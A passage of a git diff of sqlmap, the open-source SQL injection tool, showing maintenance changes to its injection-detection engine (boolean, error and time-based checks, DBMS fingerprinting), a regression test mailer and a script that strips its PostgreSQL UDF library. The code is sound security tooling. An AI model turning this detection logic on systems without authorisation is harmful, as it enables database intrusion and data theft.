[@sqlmap](https://twitter.com/sqlmap) +- Demos: http://www.youtube.com/user/inquisb/videos +- Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots + +.. |Build Status| image:: https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master + :target: https://api.travis-ci.org/sqlmapproject/sqlmap +.. |Python 2.6|2.7| image:: https://img.shields.io/badge/python-2.6|2.7-yellow.svg + :target: https://www.python.org/ +.. |License| image:: https://img.shields.io/badge/license-GPLv2-red.svg + :target: https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING +.. |Twitter| image:: https://img.shields.io/badge/twitter-@sqlmap-blue.svg + :target: https://twitter.com/sqlmap + +.. pandoc --from=markdown --to=rst --output=README.rst sqlmap/README.md +.. http://rst.ninjs.org/ +EOF +sed -i "s/^VERSION =.*/VERSION = \"$VERSION\"/g" sqlmap/lib/core/settings.py +sed -i "s/^TYPE =.*/TYPE = \"$TYPE\"/g" sqlmap/lib/core/settings.py +sed -i "s/.*lib\/core\/settings\.py/`md5sum sqlmap/lib/core/settings.py | cut -d ' ' -f 1` lib\/core\/settings\.py/g" sqlmap/txt/checksum.md5 +for file in $(find sqlmap -type f | grep -v -E "\.(git|yml)"); do echo include $file >> MANIFEST.in; done +python setup.py sdist upload +rm -rf $TMP_DIR \ No newline at end of file diff --git a/extra/shutils/regressiontest.py b/extra/shutils/regressiontest.py old mode 100755 new mode 100644 index 415714430..39cbd94d3 --- a/extra/shutils/regressiontest.py +++ b/extra/shutils/regressiontest.py @@ -1,6 +1,6 @@ #!/usr/bin/env python -# Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +# Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) # See the file 'doc/COPYING' for copying permission import codecs @@ -22,7 +22,6 @@ from lib.core.revision import getRevisionNumber START_TIME = time.strftime("%H:%M:%S %d-%m-%Y", time.gmtime()) SQLMAP_HOME = "/opt/sqlmap" -REVISION = getRevisionNumber() SMTP_SERVER = "127.0.0.1" SMTP_PORT = 25 @@ -30,7 +29,7 @@ SMTP_TIMEOUT = 30 FROM = "regressiontest@sqlmap.org" #TO = "dev@sqlmap.org" TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"] -SUBJECT = "regression test started on %s using revision %s" % (START_TIME, REVISION) +SUBJECT = "regression test started on %s using revision %s" % (START_TIME, getRevisionNumber()) TARGET = "debian" def prepare_email(content): @@ -41,7 +40,7 @@ def prepare_email(content): msg = MIMEMultipart() msg["Subject"] = SUBJECT msg["From"] = FROM - msg["To"] = TO if isinstance(TO, basestring) else ",".join(TO) + msg["To"] = TO if isinstance(TO, basestring) else ','.join(TO) msg.attach(MIMEText(content)) @@ -84,7 +83,7 @@ def main(): if stderr: failure_email("Execution of regression test failed with error:\n\n%s" % stderr) - failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout, re.M) + failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout) for failed_test in failed_tests: title = failed_test[0] diff --git a/extra/shutils/strip.sh b/extra/shutils/strip.sh new file mode 100644 index 000000000..b7ac589e2 --- /dev/null +++ b/extra/shutils/strip.sh @@ -0,0 +1,15 @@ +#!/bin/bash + +# References: http://www.thegeekstuff.com/2012/09/strip-command-examples/ +# http://www.muppetlabs.com/~breadbox/software/elfkickers.html +# https://ptspts.blogspot.hr/2013/12/how-to-make-smaller-c-and-c-binaries.html + +# For example: +# python ../../../../../extra/cloak/cloak.py -d -i lib_postgresqludf_sys.so_ +# ../../../../../extra/shutils/strip.sh lib_postgresqludf_sys.so +# python ../../../../../extra/cloak/cloak.py -i lib_postgresqludf_sys.so +# rm lib_postgresqludf_sys.so + +strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag $* +sstrip $* + diff --git a/extra/sqlharvest/__init__.py b/extra/sqlharvest/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/extra/sqlharvest/__init__.py +++ b/extra/sqlharvest/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/extra/sqlharvest/sqlharvest.py b/extra/sqlharvest/sqlharvest.py index 75dae5093..289d385d2 100644 --- a/extra/sqlharvest/sqlharvest.py +++ b/extra/sqlharvest/sqlharvest.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/__init__.py b/lib/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/__init__.py +++ b/lib/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/controller/__init__.py b/lib/controller/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/controller/__init__.py +++ b/lib/controller/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/controller/action.py b/lib/controller/action.py index b134cef15..be58b02b5 100644 --- a/lib/controller/action.py +++ b/lib/controller/action.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -16,8 +16,8 @@ from lib.core.enums import CONTENT_TYPE from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapUnsupportedDBMSException from lib.core.settings import SUPPORTED_DBMS -from lib.techniques.brute.use import columnExists -from lib.techniques.brute.use import tableExists +from lib.utils.brute import columnExists +from lib.utils.brute import tableExists def action(): """ @@ -48,9 +48,6 @@ def action(): elif kb.nullConnection: errMsg += ". You can try to rerun without using optimization " errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection") - else: - errMsg += ". Support for this DBMS will be implemented at " - errMsg += "some point" raise SqlmapUnsupportedDBMSException(errMsg) @@ -77,8 +74,7 @@ def action(): if conf.getPasswordHashes: try: - conf.dumper.userSettings("database management system users password hashes", - conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS) + conf.dumper.userSettings("database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS) except SqlmapNoneDataException, ex: logger.critical(ex) except: @@ -86,8 +82,7 @@ def action(): if conf.getPrivileges: try: - conf.dumper.userSettings("database management system users privileges", - conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES) + conf.dumper.userSettings("database management system users privileges", conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES) except SqlmapNoneDataException, ex: logger.critical(ex) except: @@ -95,8 +90,7 @@ def action(): if conf.getRoles: try: - conf.dumper.userSettings("database management system users roles", - conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES) + conf.dumper.userSettings("database management system users roles", conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES) except SqlmapNoneDataException, ex: logger.critical(ex) except: diff --git a/lib/controller/checks.py b/lib/controller/checks.py index f4c053ec9..3e4698c5c 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1,18 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import copy import httplib +import random import re import socket +import subprocess import time -from subprocess import Popen as execute - from extra.beep.beep import beep from lib.core.agent import agent from lib.core.common import Backend @@ -20,10 +20,14 @@ from lib.core.common import extractRegexResult from lib.core.common import extractTextTagContent from lib.core.common import findDynamicContent from lib.core.common import Format +from lib.core.common import getFilteredPageContent from lib.core.common import getLastRequestHTTPError from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString from lib.core.common import getSortedInjectionTests from lib.core.common import getUnicode +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite from lib.core.common import intersect from lib.core.common import listToStrValue from lib.core.common import parseFilePaths @@ -38,6 +42,7 @@ from lib.core.common import singleTimeWarnMessage from lib.core.common import urlencode from lib.core.common import wasLastResponseDBMSError from lib.core.common import wasLastResponseHTTPError +from lib.core.defaults import defaults from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -46,9 +51,11 @@ from lib.core.datatype import InjectionDict from lib.core.decorators import cachedmethod from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS +from lib.core.enums import HASHDB_KEYS from lib.core.enums import HEURISTIC_TEST from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD +from lib.core.enums import NOTE from lib.core.enums import NULLCONNECTION from lib.core.enums import PAYLOAD from lib.core.enums import PLACE @@ -57,18 +64,27 @@ from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapUserQuitException +from lib.core.settings import CANDIDATE_SENTENCE_MIN_LENGTH +from lib.core.settings import CHECK_INTERNET_ADDRESS +from lib.core.settings import CHECK_INTERNET_VALUE from lib.core.settings import DEFAULT_GET_POST_DELIMITER -from lib.core.settings import DUMMY_XSS_CHECK_APPENDIX +from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX +from lib.core.settings import FI_ERROR_REGEX from lib.core.settings import FORMAT_EXCEPTION_STRINGS from lib.core.settings import HEURISTIC_CHECK_ALPHABET +from lib.core.settings import IDS_WAF_CHECK_PAYLOAD +from lib.core.settings import IDS_WAF_CHECK_RATIO +from lib.core.settings import IDS_WAF_CHECK_TIMEOUT +from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH +from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH +from lib.core.settings import SLEEP_TIME_MARKER from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH from lib.core.settings import SUPPORTED_DBMS from lib.core.settings import URI_HTTP_HEADER from lib.core.settings import UPPER_RATIO_BOUND -from lib.core.settings import IDS_WAF_CHECK_PAYLOAD -from lib.core.settings import IDS_WAF_CHECK_RATIO from lib.core.threads import getCurrentThreadData from lib.request.connect import Connect as Request +from lib.request.comparison import comparison from lib.request.inject import checkBooleanExpression from lib.request.templates import getPageTemplate from lib.techniques.union.test import unionTest @@ -82,6 +98,13 @@ def checkSqlInjection(place, parameter, value): # Localized thread data needed for some methods threadData = getCurrentThreadData() + # Favoring non-string specific boundaries in case of digit-like parameter values + if value.isdigit(): + kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\''))) + boundaries = kb.cache.intBoundaries + else: + boundaries = conf.boundaries + # Set the flag for SQL injection test mode kb.testMode = True @@ -89,6 +112,9 @@ def checkSqlInjection(place, parameter, value): tests = getSortedInjectionTests() seenPayload = set() + kb.data.setdefault("randomInt", str(randomInt(10))) + kb.data.setdefault("randomStr", str(randomStr(10))) + while tests: test = tests.pop(0) @@ -102,7 +128,7 @@ def checkSqlInjection(place, parameter, value): # then attempt to identify with a simple DBMS specific boolean-based # test what the DBMS may be if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data: - if not Backend.getIdentifiedDbms() and kb.heuristicDbms is False: + if not Backend.getIdentifiedDbms() and kb.heuristicDbms is None and not kb.droppingRequests: kb.heuristicDbms = heuristicCheckDbms(injection) # If the DBMS has already been fingerprinted (via DBMS-specific @@ -113,7 +139,7 @@ def checkSqlInjection(place, parameter, value): SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms): msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms) msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]" - kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else [] + kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else [] # If the DBMS has been fingerprinted (via DBMS-specific error # message, via simple heuristic check or via DBMS-specific @@ -128,12 +154,13 @@ def checkSqlInjection(place, parameter, value): msg += " and " if conf.level < 5 and conf.risk < 3 else "" msg += "risk (%d)" % conf.risk if conf.risk < 3 else "" msg += " values? [Y/n]" if conf.level < 5 and conf.risk < 3 else " value? [Y/n]" - kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else [] + kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else [] title = test.title kb.testType = stype = test.stype clause = test.clause unionExtended = False + trueCode, falseCode = None, None if stype == PAYLOAD.TECHNIQUE.UNION: configUnion(test.request.char) @@ -165,17 +192,18 @@ def checkSqlInjection(place, parameter, value): lower, upper = int(match.group(1)), int(match.group(2)) for _ in (lower, upper): if _ > 1: + __ = 2 * (_ - 1) + 1 if _ == lower else 2 * _ unionExtended = True - test.request.columns = re.sub(r"\b%d\b" % _, str(2 * _), test.request.columns) - title = re.sub(r"\b%d\b" % _, str(2 * _), title) - test.title = re.sub(r"\b%d\b" % _, str(2 * _), test.title) + test.request.columns = re.sub(r"\b%d\b" % _, str(__), test.request.columns) + title = re.sub(r"\b%d\b" % _, str(__), title) + test.title = re.sub(r"\b%d\b" % _, str(__), test.title) # Skip test if the user's wants to test only for a specific # technique if conf.tech and isinstance(conf.tech, list) and stype not in conf.tech: debugMsg = "skipping test '%s' because the user " % title debugMsg += "specified to test only for " - debugMsg += "%s techniques" % " & ".join(map(lambda x: PAYLOAD.SQLINJECTION[x], conf.tech)) + debugMsg += "%s techniques" % " & ".join(PAYLOAD.SQLINJECTION[_] for _ in conf.tech) logger.debug(debugMsg) continue @@ -204,6 +232,16 @@ def checkSqlInjection(place, parameter, value): logger.debug(debugMsg) continue + # Skip tests if title, vector or DBMS is included by the + # given skip filter + if conf.testSkip and any(conf.testSkip in str(item) or \ + re.search(conf.testSkip, str(item), re.I) for item in \ + (test.title, test.vector, payloadDbms)): + debugMsg = "skipping test '%s' because its " % title + debugMsg += "name/vector/DBMS is included by the given skip filter" + logger.debug(debugMsg) + continue + if payloadDbms is not None: # Skip DBMS-specific test if it does not match the user's # provided DBMS @@ -285,12 +323,6 @@ def checkSqlInjection(place, parameter, value): comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None) - # Favoring non-string specific boundaries in case of digit-like parameter values - if value.isdigit(): - boundaries = sorted(copy.deepcopy(conf.boundaries), key=lambda x: any(_ in (x.prefix or "") or _ in (x.suffix or "") for _ in ('"', '\''))) - else: - boundaries = conf.boundaries - for boundary in boundaries: injectable = False @@ -362,8 +394,6 @@ def checkSqlInjection(place, parameter, value): # Use different page template than the original # one as we are changing parameters value, which # will likely result in a different content - kb.data.setdefault("randomInt", str(randomInt(10))) - kb.data.setdefault("randomStr", str(randomStr(10))) if conf.invalidLogical: _ = int(kb.data.randomInt[:2]) @@ -423,47 +453,110 @@ def checkSqlInjection(place, parameter, value): kb.matchRatio = None kb.negativeLogic = (where == PAYLOAD.WHERE.NEGATIVE) Request.queryPage(genCmpPayload(), place, raise404=False) - falsePage = threadData.lastComparisonPage or "" + falsePage, falseHeaders, falseCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode + falseRawResponse = "%s%s" % (falseHeaders, falsePage) # Perform the test's True request trueResult = Request.queryPage(reqPayload, place, raise404=False) - truePage = threadData.lastComparisonPage or "" + truePage, trueHeaders, trueCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode + trueRawResponse = "%s%s" % (trueHeaders, truePage) if trueResult and not(truePage == falsePage and not kb.nullConnection): + # Perform the test's False request falseResult = Request.queryPage(genCmpPayload(), place, raise404=False) - # Perform the test's False request if not falseResult: - infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title) - logger.info(infoMsg) + if kb.negativeLogic: + boundPayload = agent.prefixQuery(kb.data.randomStr, prefix, where, clause) + boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where) + errorPayload = agent.payload(place, parameter, newValue=boundPayload, where=where) + + errorResult = Request.queryPage(errorPayload, place, raise404=False) + if errorResult: + continue + elif not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)): + _ = comparison(kb.heuristicPage, None, getRatioValue=True) + if _ > kb.matchRatio: + kb.matchRatio = _ + logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio) injectable = True - if not injectable and not any((conf.string, conf.notString, conf.regexp)) and kb.pageStable: - trueSet = set(extractTextTagContent(truePage)) - falseSet = set(extractTextTagContent(falsePage)) - candidates = filter(None, (_.strip() if _.strip() in (kb.pageTemplate or "") and _.strip() not in falsePage and _.strip() not in threadData.lastComparisonHeaders else None for _ in (trueSet - falseSet))) + elif threadData.lastComparisonRatio > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)): + originalSet = set(getFilteredPageContent(kb.pageTemplate, True, "\n").split("\n")) + trueSet = set(getFilteredPageContent(truePage, True, "\n").split("\n")) + falseSet = set(getFilteredPageContent(falsePage, True, "\n").split("\n")) - if candidates: - conf.string = candidates[0] - infoMsg = "%s parameter '%s' seems to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'")) - logger.info(infoMsg) + if originalSet == trueSet != falseSet: + candidates = trueSet - falseSet - injectable = True + if candidates: + candidates = sorted(candidates, key=lambda _: len(_)) + for candidate in candidates: + if re.match(r"\A[\w.,! ]+\Z", candidate) and ' ' in candidate and candidate.strip() and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH: + conf.string = candidate + injectable = True + + infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'")) + logger.info(infoMsg) + + break + + if injectable: + if kb.pageStable and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)): + if all((falseCode, trueCode)) and falseCode != trueCode: + conf.code = trueCode + + infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --code=%d)" % (paramType, parameter, title, conf.code) + logger.info(infoMsg) + else: + trueSet = set(extractTextTagContent(trueRawResponse)) + trueSet = trueSet.union(__ for _ in trueSet for __ in _.split()) + + falseSet = set(extractTextTagContent(falseRawResponse)) + falseSet = falseSet.union(__ for _ in falseSet for __ in _.split()) + + candidates = filter(None, (_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet))) + + if candidates: + candidates = sorted(candidates, key=lambda _: len(_)) + for candidate in candidates: + if re.match(r"\A\w+\Z", candidate): + break + + conf.string = candidate + + infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --string=\"%s\")" % (paramType, parameter, title, repr(conf.string).lstrip('u').strip("'")) + logger.info(infoMsg) + + if not any((conf.string, conf.notString)): + candidates = filter(None, (_.strip() if _.strip() in falseRawResponse and _.strip() not in trueRawResponse else None for _ in (falseSet - trueSet))) + + if candidates: + candidates = sorted(candidates, key=lambda _: len(_)) + for candidate in candidates: + if re.match(r"\A\w+\Z", candidate): + break + + conf.notString = candidate + + infoMsg = "%s parameter '%s' appears to be '%s' injectable (with --not-string=\"%s\")" % (paramType, parameter, title, repr(conf.notString).lstrip('u').strip("'")) + logger.info(infoMsg) + + if not any((conf.string, conf.notString, conf.code)): + infoMsg = "%s parameter '%s' appears to be '%s' injectable " % (paramType, parameter, title) + singleTimeLogMessage(infoMsg) # In case of error-based SQL injection elif method == PAYLOAD.METHOD.GREP: # Perform the test's request and grep the response # body for the test's regular expression try: - page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False) + page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False) output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(check, listToStrValue( \ - [headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] \ - if headers else None), re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(check, threadData.lastRedirectMsg[1] \ - if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ - threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) + or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) \ + or extractRegexResult(check, listToStrValue([headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] if headers else None), re.DOTALL | re.IGNORECASE) \ + or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) if output: result = output == "1" @@ -485,13 +578,20 @@ def checkSqlInjection(place, parameter, value): elif method == PAYLOAD.METHOD.TIME: # Perform the test's request trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False) + trueCode = threadData.lastCode if trueResult: + # Extra validation step (e.g. to check for DROP protection mechanisms) + if SLEEP_TIME_MARKER in reqPayload: + falseResult = Request.queryPage(reqPayload.replace(SLEEP_TIME_MARKER, "0"), place, timeBasedCompare=True, raise404=False) + if falseResult: + continue + # Confirm test's results trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False) if trueResult: - infoMsg = "%s parameter '%s' seems to be '%s' injectable " % (paramType, parameter, title) + infoMsg = "%s parameter '%s' appears to be '%s' injectable " % (paramType, parameter, title) logger.info(infoMsg) injectable = True @@ -511,7 +611,7 @@ def checkSqlInjection(place, parameter, value): warnMsg = "using unescaped version of the test " warnMsg += "because of zero knowledge of the " warnMsg += "back-end DBMS. You can try to " - warnMsg += "explicitly set it using option '--dbms'" + warnMsg += "explicitly set it with option '--dbms'" singleTimeWarnMessage(warnMsg) else: Backend.forceDbms(kb.heuristicDbms) @@ -530,7 +630,8 @@ def checkSqlInjection(place, parameter, value): msg += "extended UNION tests if there is not " msg += "at least one other (potential) " msg += "technique found. Do you want to skip? [Y/n] " - kb.futileUnion = readInput(msg, default="Y").strip().upper() == 'N' + + kb.futileUnion = not readInput(msg, default='Y', boolean=True) if kb.futileUnion is False: continue @@ -571,20 +672,20 @@ def checkSqlInjection(place, parameter, value): # Feed with test details every time a test is successful if hasattr(test, "details"): - for dKey, dValue in test.details.items(): - if dKey == "dbms": - injection.dbms = dValue + for key, value in test.details.items(): + if key == "dbms": + injection.dbms = value - if not isinstance(dValue, list): - Backend.setDbms(dValue) + if not isinstance(value, list): + Backend.setDbms(value) else: - Backend.forceDbms(dValue[0], True) + Backend.forceDbms(value[0], True) - elif dKey == "dbms_version" and injection.dbms_version is None and not conf.testFilter: - injection.dbms_version = Backend.setVersion(dValue) + elif key == "dbms_version" and injection.dbms_version is None and not conf.testFilter: + injection.dbms_version = Backend.setVersion(value) - elif dKey == "os" and injection.os is None: - injection.os = Backend.setOs(dValue) + elif key == "os" and injection.os is None: + injection.os = Backend.setOs(value) if vector is None and "vector" in test and test.vector is not None: vector = test.vector @@ -597,9 +698,12 @@ def checkSqlInjection(place, parameter, value): injection.data[stype].comment = comment injection.data[stype].templatePayload = templatePayload injection.data[stype].matchRatio = kb.matchRatio + injection.data[stype].trueCode = trueCode + injection.data[stype].falseCode = falseCode injection.conf.textOnly = conf.textOnly injection.conf.titles = conf.titles + injection.conf.code = conf.code injection.conf.string = conf.string injection.conf.notString = conf.notString injection.conf.regexp = conf.regexp @@ -613,7 +717,7 @@ def checkSqlInjection(place, parameter, value): infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert logger.info(infoMsg) - process = execute(conf.alert, shell=True) + process = subprocess.Popen(conf.alert, shell=True) process.wait() kb.alerted = True @@ -634,25 +738,23 @@ def checkSqlInjection(place, parameter, value): logger.warn(warnMsg) msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]" - choice = readInput(msg, default="S", checkBatch=False) + choice = readInput(msg, default='S', checkBatch=False).upper() - if choice[0] in ("s", "S"): - pass - elif choice[0] in ("c", "C"): + if choice == 'C': choice = None while not ((choice or "").isdigit() and 0 <= int(choice) <= 6): if choice: logger.warn("invalid value") msg = "enter new verbosity level: [0-6] " - choice = readInput(msg, default=str(conf.verbose), checkBatch=False).strip() + choice = readInput(msg, default=str(conf.verbose), checkBatch=False) conf.verbose = int(choice) setVerbosity() tests.insert(0, test) - elif choice[0] in ("n", "N"): + elif choice == 'N': return None - elif choice[0] in ("e", "E"): + elif choice == 'E': kb.endDetection = True - elif choice[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException finally: @@ -664,19 +766,20 @@ def checkSqlInjection(place, parameter, value): # Return the injection object if injection.place is not None and injection.parameter is not None: if not conf.dropSetCookie and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data and injection.data[PAYLOAD.TECHNIQUE.BOOLEAN].vector.startswith('OR'): - warnMsg = "in OR boolean-based injections, please consider usage " + warnMsg = "in OR boolean-based injection cases, please consider usage " warnMsg += "of switch '--drop-set-cookie' if you experience any " warnMsg += "problems during data retrieval" logger.warn(warnMsg) - injection = checkFalsePositives(injection) - - if not injection: + if not checkFalsePositives(injection): kb.vulnHosts.remove(conf.hostname) + if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes: + injection.notes.append(NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE) + else: injection = None - if injection: + if injection and NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes: checkSuhosinPatch(injection) checkFilteredChars(injection) @@ -695,12 +798,12 @@ def heuristicCheckDbms(injection): kb.injection = injection for dbms in getPublicTypeMembers(DBMS, True): - if not FROM_DUMMY_TABLE.get(dbms, ""): - continue - randStr1, randStr2 = randomStr(), randomStr() Backend.forceDbms(dbms) + if conf.noEscape and dbms not in FROM_DUMMY_TABLE: + continue + if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)): if not checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr2)): retVal = dbms @@ -714,6 +817,8 @@ def heuristicCheckDbms(injection): infoMsg += "could be '%s' " % retVal logger.info(infoMsg) + kb.heuristicExtendedDbms = retVal + return retVal def checkFalsePositives(injection): @@ -721,7 +826,7 @@ def checkFalsePositives(injection): Checks for false positives (only in single special cases) """ - retVal = injection + retVal = True if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\ (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title): @@ -747,26 +852,30 @@ def checkFalsePositives(injection): break if not checkBooleanExpression("%d=%d" % (randInt1, randInt1)): - retVal = None + retVal = False break # Just in case if DBMS hasn't properly recovered from previous delayed request if PAYLOAD.TECHNIQUE.BOOLEAN not in injection.data: checkBooleanExpression("%d=%d" % (randInt1, randInt2)) - if checkBooleanExpression("%d=%d" % (randInt1, randInt3)): - retVal = None + if checkBooleanExpression("%d=%d" % (randInt1, randInt3)): # this must not be evaluated to True + retVal = False break - elif checkBooleanExpression("%d=%d" % (randInt3, randInt2)): - retVal = None + elif checkBooleanExpression("%d=%d" % (randInt3, randInt2)): # this must not be evaluated to True + retVal = False break - elif not checkBooleanExpression("%d=%d" % (randInt2, randInt2)): - retVal = None + elif not checkBooleanExpression("%d=%d" % (randInt2, randInt2)): # this must be evaluated to True + retVal = False break - if retVal is None: + elif checkBooleanExpression("%d %d" % (randInt3, randInt2)): # this must not be evaluated to True (invalid statement) + retVal = False + break + + if not retVal: warnMsg = "false positive or unexploitable injection point detected" logger.warn(warnMsg) @@ -833,8 +942,10 @@ def heuristicCheckSqlInjection(place, parameter): origValue = conf.paramDict[place][parameter] paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place + prefix = "" suffix = "" + randStr = "" if conf.prefix or conf.suffix: if conf.prefix: @@ -843,17 +954,16 @@ def heuristicCheckSqlInjection(place, parameter): if conf.suffix: suffix = conf.suffix - randStr = "" - - while '\'' not in randStr: + while randStr.count('\'') != 1 or randStr.count('\"') != 1: randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET) kb.heuristicMode = True payload = "%s%s%s" % (prefix, randStr, suffix) payload = agent.payload(place, parameter, newValue=payload) - page, _ = 